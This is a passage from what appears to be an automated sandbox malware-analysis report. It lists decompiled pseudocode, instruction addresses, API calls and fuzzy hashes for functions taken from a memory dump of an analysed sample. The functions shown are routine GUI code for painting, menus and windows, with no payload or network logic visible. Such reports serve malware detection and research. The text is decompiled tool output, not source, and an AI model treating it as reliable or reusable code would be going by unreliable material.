					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                  0x0043bc24
                                  0x0043bc25
                                  0x0043bc2f
                                  0x0043bc32
                                  0x0043bc35
                                  0x0043bc38
                                  0x0043bc3a
                                  0x0043bc3f
                                  0x0043bc40
                                  0x0043bc45
                                  0x0043bc48
                                  0x0043bc4d
                                  0x0043bc52
                                  0x0043bc56
                                  0x0043bc66
                                  0x0043bc75
                                  0x0043bc78
                                  0x0043bc7d
                                  0x0043bc7d
                                  0x0043bc7d
                                  0x0043bc68
                                  0x0043bc6b
                                  0x0043bc6b
                                  0x0043bc80
                                  0x0043bc80
                                  0x0043bc8c
                                  0x0043bc94
                                  0x0043bcba
                                  0x0043bcc2
                                  0x0043bcc7
                                  0x0043bd05
                                  0x0043bd0a
                                  0x0043bd0e
                                  0x0043bd13
                                  0x0043bd1f
                                  0x0043bd27
                                  0x0043bd27
                                  0x0043bd2c
                                  0x0043bd30
                                  0x0043bdcd
                                  0x0043bdd5
                                  0x0043bdde
                                  0x0043bded
                                  0x0043bdf2
                                  0x0043bdf4
                                  0x0043bdf7
                                  0x0043bdfa
                                  0x0043be07
                                  0x0043bd36
                                  0x0043bd36
                                  0x0043bd3a
                                  0x0043bd44
                                  0x0043bd54
                                  0x0043bd61
                                  0x0043bd6a
                                  0x0043bd79
                                  0x0043bd86
                                  0x0043bd86
                                  0x0043bd8b
                                  0x0043bd8f
                                  0x0043bdbd
                                  0x0043bdc8
                                  0x0043bd91
                                  0x0043bd96
                                  0x0043bda2
                                  0x0043bda7
                                  0x0043bda9
                                  0x00000000
                                  0x00000000
                                  0x0043bdb6
                                  0x0043bdb6
                                  0x00000000
                                  0x0043bd8f
                                  0x0043bd30
                                  0x0043bccc
                                  0x0043bcda
                                  0x0043bcdb
                                  0x0043bcdc
                                  0x0043bcdd
                                  0x0043bcde
                                  0x0043bcf3
                                  0x0043bcf3
                                  0x00000000
                                  0x0043bc96
                                  0x0043bc9a
                                  0x0043bcad
                                  0x0043bcb5
                                  0x00000000
                                  0x0043bcb5
                                  0x0043bca2
                                  0x00000000
                                  0x00000000
                                  0x0043bca7
                                  0x0043bcab
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043bcab

                                  APIs
                                  • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0043BCF3
                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0043BD44
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043BD79
                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0043BD86
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043BDED
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Draw$OffsetRectText$Edge
                                  • String ID:
                                  • API String ID: 3610532707-0
                                  • Opcode ID: eecb988e9c119212afa5e563ae6a382eee1a8c119e98055a20db531d47a5d918
                                  • Instruction ID: 770d8ba28c4c687157e0b5afbc310096ec3b90bfe142911fd7fff1e70f22e3d7
                                  • Opcode Fuzzy Hash: eecb988e9c119212afa5e563ae6a382eee1a8c119e98055a20db531d47a5d918
                                  • Instruction Fuzzy Hash: 92516370A00608AFDB20EBA9CC86B9E77A5EF49314F14516AFA10E7391C73C9D40879D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430258, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00430258(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E004325A4(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x430378);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E00413524( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E004303B0(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43037f);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E004325A4(_v8),  &_v84);
				}
				return _t55;
			}


















                                  0x00430259
                                  0x0043025b
                                  0x00430261
                                  0x00430264
                                  0x0043026a
                                  0x0043026f
                                  0x00430283
                                  0x00430283
                                  0x00430287
                                  0x00430288
                                  0x0043028d
                                  0x00430290
                                  0x0043029d
                                  0x004302b7
                                  0x004302ba
                                  0x004302cd
                                  0x004302d0
                                  0x004302d2
                                  0x004302d3
                                  0x004302d5
                                  0x004302e0
                                  0x004302e9
                                  0x004302fb
                                  0x00000000
                                  0x004302fd
                                  0x00430319
                                  0x00430320
                                  0x00000000
                                  0x00000000
                                  0x00430320
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00430322
                                  0x00430322
                                  0x00430323
                                  0x00430323
                                  0x004302d5
                                  0x00430326
                                  0x0043032a
                                  0x00430333
                                  0x00430333
                                  0x0043033e
                                  0x0043029f
                                  0x004302a6
                                  0x004302a6
                                  0x0043034a
                                  0x00430351
                                  0x00430354
                                  0x00430357
                                  0x0043035c
                                  0x00430363
                                  0x00000000
                                  0x00430372
                                  0x00430377

                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 0043027E
                                  • SaveDC.GDI32(?), ref: 004302B2
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00430314
                                  • RestoreDC.GDI32(?,?), ref: 0043033E
                                  • EndPaint.USER32(00000000,?,0043037F), ref: 00430372
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                  • String ID:
                                  • API String ID: 3808407030-0
                                  • Opcode ID: 426f0bc97d995b4f29184d9aeda48a9801961a6e61c348b58cff2bb6961ac1f2
                                  • Instruction ID: 2cbea0fc1a96a17e9753ad3855e5c0c3d90960595657c2e0c385e8d183e91b6b
                                  • Opcode Fuzzy Hash: 426f0bc97d995b4f29184d9aeda48a9801961a6e61c348b58cff2bb6961ac1f2
                                  • Instruction Fuzzy Hash: 91417F70A00204EFC700DF99C895F9EB7F9AF48308F1591AAE9049B362D7799E41CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043BA64, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043BA64(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0043BA64(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0043BB94(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0043BB94(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0043BB94(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0043B924(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x43a578; // 0x43a5c4
						if(E00403264( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0043BB94(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                  0x0043ba64
                                  0x0043ba68
                                  0x0043ba6e
                                  0x0043ba78
                                  0x0043ba7a
                                  0x00000000
                                  0x0043ba7a
                                  0x0043ba83
                                  0x0043ba88
                                  0x00000000
                                  0x0043ba8a
                                  0x0043ba9c
                                  0x0043baa1
                                  0x0043baa5
                                  0x0043baaa
                                  0x0043bab3
                                  0x0043babd
                                  0x0043bac4
                                  0x0043bad4
                                  0x0043bad9
                                  0x0043bad9
                                  0x0043badb
                                  0x0043badc
                                  0x0043bae2
                                  0x0043bae8
                                  0x0043bb1d
                                  0x0043bb1f
                                  0x0043bb24
                                  0x00000000
                                  0x0043bb2a
                                  0x0043baed
                                  0x0043bafa
                                  0x00000000
                                  0x0043bb0d
                                  0x0043bb11
                                  0x0043bb18
                                  0x00000000
                                  0x0043bb18
                                  0x0043bafa
                                  0x0043bae2
                                  0x0043bb31

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc77e7b606c20dafbaffba304912d57caf067f4ef98f715a41b6e52034405a3f
                                  • Instruction ID: a138e1dd5d0a6c724fdcb838444c9593fe750754abf0e23448e7e5fe295c89ce
                                  • Opcode Fuzzy Hash: bc77e7b606c20dafbaffba304912d57caf067f4ef98f715a41b6e52034405a3f
                                  • Instruction Fuzzy Hash: 1411757170170956DA20BA3A9915B6BB688DF49788F04202BBF159B79BCF3CEC0586DC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044AE64, Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044AE64(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x44f664 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00428DD0(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E004325A4(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                  0x0044ae64
                                  0x0044ae68
                                  0x0044ae6a
                                  0x0044ae6c
                                  0x0044ae6e
                                  0x0044ae76
                                  0x0044af15
                                  0x0044af1b
                                  0x0044ae87
                                  0x0044ae8c
                                  0x0044ae90
                                  0x0044aef6
                                  0x0044af13
                                  0x0044af13
                                  0x00000000
                                  0x0044aef6
                                  0x0044ae92
                                  0x0044ae94
                                  0x0044ae94
                                  0x0044ae99
                                  0x0044aeb4
                                  0x0044aebd
                                  0x0044aeb2
                                  0x00000000
                                  0x0044aeb2
                                  0x0044aec5
                                  0x0044aec7
                                  0x0044aec7
                                  0x00000000
                                  0x0044aea3
                                  0x0044aea8
                                  0x0044aec9
                                  0x0044aee2
                                  0x0044aee4
                                  0x0044aee4
                                  0x00000000
                                  0x0044aee2
                                  0x0044ae99

                                  APIs
                                  • GetCapture.USER32 ref: 0044AE87
                                  • SendMessageA.USER32(00000000,-0000BBEE,0044C944,?), ref: 0044AEDB
                                  • GetWindowLongA.USER32 ref: 0044AEEB
                                  • SendMessageA.USER32(00000000,-0000BBEE,0044C944,?), ref: 0044AF0A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: MessageSend$CaptureLongWindow
                                  • String ID:
                                  • API String ID: 1158686931-0
                                  • Opcode ID: bd220cbe231fa97cab9fdf5e378c2613da9bc657ae87be3824c234f9089f1116
                                  • Instruction ID: ef513cd2bc4fcdfa4c64a601a596c04d1988ae277f1372532c10e8b3e33c55ce
                                  • Opcode Fuzzy Hash: bd220cbe231fa97cab9fdf5e378c2613da9bc657ae87be3824c234f9089f1116
                                  • Instruction Fuzzy Hash: 6B1193712842095FE760FA59CD44E5773DC9B18315B21043AFE6AC3342EB2CFC24836A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433C74, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 22%
                                  			E00433C74(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x44de70; // 0x44f8f8
					_t17 =  *0x44de70; // 0x44f8f8
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L00421A44();
					_v8 = _t19;
					_push(_t49);
					_push(0x433d34);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x44e0ec; // 0x44fbb4
					E00421A7C(_v8, E00449250( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x44e0ec; // 0x44fbb4
					E00421A7C(_v8, E00449250( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L00421AC8();
					_push( &_v16);
					_push(0);
					L00421AD8();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L00421AC8();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x433d3b);
					_t37 = _v8;
					_push(_t37);
					L00421A4C();
					return _t37;
				}
			}

















                                  0x00433c75
                                  0x00433c77
                                  0x00433c7b
                                  0x00433c82
                                  0x00433d3f
                                  0x00433c88
                                  0x00433c90
                                  0x00433c9c
                                  0x00433ca3
                                  0x00433ca5
                                  0x00433ca6
                                  0x00433cab
                                  0x00433cb0
                                  0x00433cb1
                                  0x00433cb6
                                  0x00433cb9
                                  0x00433cc0
                                  0x00433cd1
                                  0x00433cda
                                  0x00433ceb
                                  0x00433cf0
                                  0x00433cf2
                                  0x00433cf4
                                  0x00433cf9
                                  0x00433cfa
                                  0x00433d02
                                  0x00433d03
                                  0x00433d05
                                  0x00433d0d
                                  0x00433d11
                                  0x00433d12
                                  0x00433d17
                                  0x00433d18
                                  0x00433d1f
                                  0x00433d22
                                  0x00433d25
                                  0x00433d2a
                                  0x00433d2d
                                  0x00433d2e
                                  0x00433d33
                                  0x00433d33

                                  APIs
                                  • 73451AB0.COMCTL32(00000000), ref: 00433CA6
                                    • Part of subcall function 00421A7C: 73452140.COMCTL32(00429F8A,000000FF,00000000,00433CD6,00000000,00433D34,?,00000000), ref: 00421A80
                                  • 73451680.COMCTL32(00429F8A,00000000,00000000,00000000,00000000,00433D34,?,00000000), ref: 00433CFA
                                  • 73451710.COMCTL32(00000000,?,00429F8A,00000000,00000000,00000000,00000000,00433D34,?,00000000), ref: 00433D05
                                  • 73451680.COMCTL32(00429F8A,00000001,?,00433D9D,00000000,?,00429F8A,00000000,00000000,00000000,00000000,00433D34,?,00000000), ref: 00433D18
                                  • 73451F60.COMCTL32(00429F8A,00433D3B,00433D9D,00000000,?,00429F8A,00000000,00000000,00000000,00000000,00433D34,?,00000000), ref: 00433D2E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: 7345173451680$7345171073452140
                                  • String ID:
                                  • API String ID: 821207058-0
                                  • Opcode ID: 9c833fe73ebdf13cb94b6f5bdc1877bd06ebeef86041004fe154490c8890c4d4
                                  • Instruction ID: bc963e7fe8c07e1dfc54649089f76d9c2cb54ca911fcdcb56c2011639fa6014d
                                  • Opcode Fuzzy Hash: 9c833fe73ebdf13cb94b6f5bdc1877bd06ebeef86041004fe154490c8890c4d4
                                  • Instruction Fuzzy Hash: 0F216674740214AFEB00EFA9DC82F6E73F8EB49714F5044A6F904DB2A1D6B99E40C754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041FCD8, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E0041FCD8(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E0041E738(_t22);
					}
					_t21 = E0041D834( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L004062C0();
						_t21 = E0041D144(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00406058();
							_push(0xe);
							_push(_t38);
							L00406058();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L004064F8();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                  0x0041fcd8
                                  0x0041fcdc
                                  0x0041fcde
                                  0x0041fce5
                                  0x0041fcff
                                  0x0041fd05
                                  0x0041fd07
                                  0x0041fd07
                                  0x0041fd1e
                                  0x0041fd23
                                  0x0041fd25
                                  0x0041fd2a
                                  0x0041fd2c
                                  0x0041fd2e
                                  0x0041fd33
                                  0x0041fd38
                                  0x0041fd3e
                                  0x0041fd67
                                  0x0041fd67
                                  0x0041fd40
                                  0x0041fd40
                                  0x0041fd42
                                  0x0041fd43
                                  0x0041fd4a
                                  0x0041fd4c
                                  0x0041fd4d
                                  0x0041fd52
                                  0x0041fd5d
                                  0x0041fd61
                                  0x00000000
                                  0x0041fd63
                                  0x0041fd63
                                  0x0041fd63
                                  0x0041fd61
                                  0x0041fd69
                                  0x0041fd6e
                                  0x0041fd71
                                  0x0041fd76
                                  0x0041fd76
                                  0x0041fd79
                                  0x0041fd7a
                                  0x0041fd7c
                                  0x0041fd85
                                  0x0041fd87
                                  0x00000000
                                  0x0041fd87
                                  0x0041fd85
                                  0x0041fd2a
                                  0x0041fd8f

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD2E
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD43
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD4D
                                  • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD71
                                  • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD7C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B380CreateHalftonePalette
                                  • String ID:
                                  • API String ID: 178651289-0
                                  • Opcode ID: 43e94dcf87bd10a2320dac9477a5928ed2524be052d737dca86fdd28d82a04de
                                  • Instruction ID: 4fc3df88822694d9f9b675b0e4ed27e520da0a8ba98eca0841959ec518dc6fb5
                                  • Opcode Fuzzy Hash: 43e94dcf87bd10a2320dac9477a5928ed2524be052d737dca86fdd28d82a04de
                                  • Instruction Fuzzy Hash: 3B11B4316416999AEB20EF35A8417FF2B90AB05354F44013BFC029A2C1D7B888DAC3A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004484EC, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E004484EC(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x44dc1c != 0) {
					_t16 = E00432804(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E004325A4(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E004325A4(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x44dc1c(E004325A4(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0044DCA0 |  *0x0044DCA8);
						} else {
							SetWindowLongA(E004325A4(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E004325A4(_t38);
							_push(_t37);
							L004064D0();
							return _t37;
						}
					}
				}
				return _t16;
			}







                                  0x004484ec
                                  0x004484ee
                                  0x004484f4
                                  0x00448509
                                  0x00448510
                                  0x00448525
                                  0x0044852e
                                  0x0044853f
                                  0x00448552
                                  0x00448552
                                  0x00000000
                                  0x00448594
                                  0x004485a5
                                  0x004485aa
                                  0x004485af
                                  0x004485b1
                                  0x004485b5
                                  0x004485ba
                                  0x004485bb
                                  0x00000000
                                  0x004485bb
                                  0x0044852e
                                  0x00448510
                                  0x004485c2

                                  APIs
                                  • GetWindowLongA.USER32 ref: 00448520
                                  • SetWindowLongA.USER32 ref: 00448552
                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004460E0), ref: 0044858C
                                  • SetWindowLongA.USER32 ref: 004485A5
                                  • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004460E0), ref: 004485BB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$Long$AttributesB330Layered
                                  • String ID:
                                  • API String ID: 1770052509-0
                                  • Opcode ID: 4bf1c80420186bbb8f992b8d6403ea2b853f778bb12e7e5c604072dbf94b495f
                                  • Instruction ID: dc78413d2246636a4a4492c1fa27383537d7cfffe27dbc18fe6c52167567d637
                                  • Opcode Fuzzy Hash: 4bf1c80420186bbb8f992b8d6403ea2b853f778bb12e7e5c604072dbf94b495f
                                  • Instruction Fuzzy Hash: F3118A70A0529039DB557F798D99B4E26880F0A328F14297EB945EB2D7CEBCC944C76C
                                  Uniqueness

